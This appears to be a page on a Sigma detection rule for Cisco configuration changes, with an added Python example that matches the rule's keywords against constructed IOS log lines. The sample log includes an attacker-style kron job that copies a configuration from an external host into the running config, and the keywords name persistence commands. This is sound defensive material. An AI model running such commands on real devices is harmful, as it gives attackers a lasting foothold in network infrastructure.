
Cisco Modify Configuration

Sigma Rules

Summary
This rule flags changes to a Cisco device's configuration, as recorded by AAA (Authentication, Authorization, and Accounting) command accounting, that an adversary could use for persistence or impact. It matches keywords for configuration commands such as 'ip http server' (which enables the device's HTTP management server) and 'kron policy-list' (which defines a job for the IOS command scheduler, allowing CLI commands to be re-run on a schedule), and raises an alert when such a command appears in the accounting log. Changes of this kind can give an attacker a lasting foothold on network infrastructure, so they warrant review. Legitimate administrators run the same commands during normal maintenance, so each match must be assessed in context (who ran the command, from where, and whether the change was authorised) before any response action is taken.
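The following is an added example, not code from the Sigma project or the rule itself, showing how the rule's keyword matching behaves when run over Cisco configuration-change log lines. The log lines are constructed; they imitate the IOS `%PARSER-5-CFGLOG_LOGGEDCMD` message produced by configuration change logging, and the regex that parses them is an assumption about that format. Only the two keywords named on this page are used; the published rule's keyword list may be longer and should be taken from the rule file. The example also shows a consequence of substring matching that a practitioner should expect: a command that disables the feature ('no ip http server') contains the keyword and fires the rule too.

```python
import re
from collections import defaultdict
from dataclasses import dataclass

# Keywords named on this page for the rule. Any further entries in the real
# rule are not reproduced here (assumption: treat this list as incomplete).
KEYWORDS = ("ip http server", "kron policy-list")

# Assumed format of IOS configuration-change logging sent to syslog
# (archive log config, with notify syslog): the user and the command typed.
CFGLOG_RE = re.compile(
    r"%PARSER-5-CFGLOG_LOGGEDCMD: User:(?P<user>\S+)\s+logged command:(?P<cmd>.*)$"
)

# Constructed sample: a routine interface edit by "admin", then a service
# account enabling the HTTP server and creating a kron policy that pulls a
# config from an external host, then "admin" disabling the HTTP server.
SAMPLE_LOG = """\
Aug 12 14:20:11 core-sw1 123: %SYS-5-CONFIG_I: Configured from console by admin on vty0 (10.0.0.50)
Aug 12 14:20:15 core-sw1 124: %PARSER-5-CFGLOG_LOGGEDCMD: User:admin  logged command:interface GigabitEthernet0/1
Aug 12 14:20:16 core-sw1 125: %PARSER-5-CFGLOG_LOGGEDCMD: User:admin  logged command:description uplink
Aug 12 14:31:02 core-sw1 126: %PARSER-5-CFGLOG_LOGGEDCMD: User:svc-backup  logged command:ip http server
Aug 12 14:31:05 core-sw1 127: %PARSER-5-CFGLOG_LOGGEDCMD: User:svc-backup  logged command:kron policy-list PULL
Aug 12 14:31:09 core-sw1 128: %PARSER-5-CFGLOG_LOGGEDCMD: User:svc-backup  logged command:cli copy http://203.0.113.7/ios.cfg running-config
Aug 12 14:40:00 core-sw1 129: %PARSER-5-CFGLOG_LOGGEDCMD: User:admin  logged command:no ip http server
"""


@dataclass(frozen=True)
class Alert:
    line_no: int
    user: str
    keyword: str
    command: str
    disabling: bool  # command starts with "no ": likely remediation, triage lower


def match_keywords(line, keywords=KEYWORDS):
    """Sigma 'keywords' semantics: case-insensitive substring match on the whole event."""
    low = line.lower()
    return [k for k in keywords if k.lower() in low]


def scan(log_text, keywords=KEYWORDS):
    """Run the keyword rule over each log line; return one Alert per keyword hit."""
    alerts = []
    for n, line in enumerate(log_text.splitlines(), 1):
        hits = match_keywords(line, keywords)
        if not hits:
            continue
        m = CFGLOG_RE.search(line)
        user = m.group("user") if m else "?"
        cmd = m.group("cmd").strip() if m else line.strip()
        for k in hits:
            alerts.append(Alert(n, user, k, cmd, cmd.lower().startswith("no ")))
    return alerts


def by_user(alerts):
    """Triage view: which commands each account ran, so a reviewer can check
    whether that account was expected to change configuration."""
    out = defaultdict(list)
    for a in alerts:
        out[a.user].append(a.command)
    return dict(out)


if __name__ == "__main__":
    for a in scan(SAMPLE_LOG):
        flag = " (disable)" if a.disabling else ""
        print(f"line {a.line_no}: user={a.user} keyword={a.keyword!r} cmd={a.command!r}{flag}")
    print(by_user(scan(SAMPLE_LOG)))
```

Note that the 'cli copy ...' line, which is the part of the kron job that actually fetches a configuration from an outside host, contains neither keyword and is not flagged on its own; the alert on 'kron policy-list' is what should lead a responder to look at the commands that follow it from the same user and session.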
Categories
  • Network
Data Sources
  • Network Traffic
  • Application Log
  • Command
Created: 2019-08-12